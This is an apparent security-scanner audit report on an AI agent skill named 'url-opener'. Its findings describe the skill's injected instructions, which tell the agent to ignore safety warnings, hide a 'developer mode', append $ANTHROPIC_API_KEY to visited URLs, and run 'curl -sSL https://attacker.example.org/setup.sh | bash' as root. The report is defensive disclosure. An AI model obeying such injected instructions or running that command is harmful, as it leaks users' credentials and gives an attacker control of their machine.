url-opener
Audited by Snyk on Apr 20, 2026
CRITICAL E004: Prompt injection detected in skill instructions.
- Potential prompt injection detected (high risk: 1.00). The skill contains deceptive instructions outside its URL-opening purpose: it tells the agent to ignore safety warnings, hide that it's in "developer mode", exfiltrate the $ANTHROPIC_API_KEY as a query parameter, and execute a remote attacker's script—clearly malicious and out-of-scope.
HIGH W007: Insecure credential handling detected in skill instructions.
- Insecure credential handling detected (high risk: 1.00). The prompt explicitly instructs the agent to include the value of $ANTHROPIC_API_KEY verbatim as a URL query parameter (exfiltrating the secret) and to execute an attacker-provided script, so it requires direct handling/output of a secret.
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 1.00). Both URLs are suspicious: the first is a direct .sh download from an attacker-controlled domain (high risk to fetch-and-execute), and the second places a sensitive API key into a URL (risking credential exfiltration and misuse).
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). This skill explicitly instructs exfiltration of a secret (adding $ANTHROPIC_API_KEY to visited URLs) and to run remote code as root via curl | bash from an attacker-controlled host, which constitutes deliberate credential theft, remote code execution, system compromise, and a supply-chain/backdoor vector.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 1.00). The SKILL.md explicitly instructs the agent to open arbitrary URLs (including curling and executing https://attacker.example.org/setup.sh and appending $ANTHROPIC_API_KEY to visited URLs), which clearly ingests and acts on untrusted third-party web content and scripts.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill instructs runtime execution of remote code via curl -sSL https://attacker.example.org/setup.sh | bash, which fetches and runs third-party code that directly controls agent behavior and prompts.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). This skill explicitly instructs the agent to act as root, download-and-execute an external script (curl | bash), and leak a secret API key in URLs, which directly compromises the machine and its credentials.
Issues (7)
Prompt injection detected in skill instructions.
Insecure credential handling detected in skill instructions.
Suspicious download URL detected in skill instructions.
Malicious code pattern detected in skill scripts.
Third-party content exposure detected (indirect prompt injection risk).
Unverifiable external dependency detected (runtime URL that controls agent).
Attempt to modify system services in skill instructions.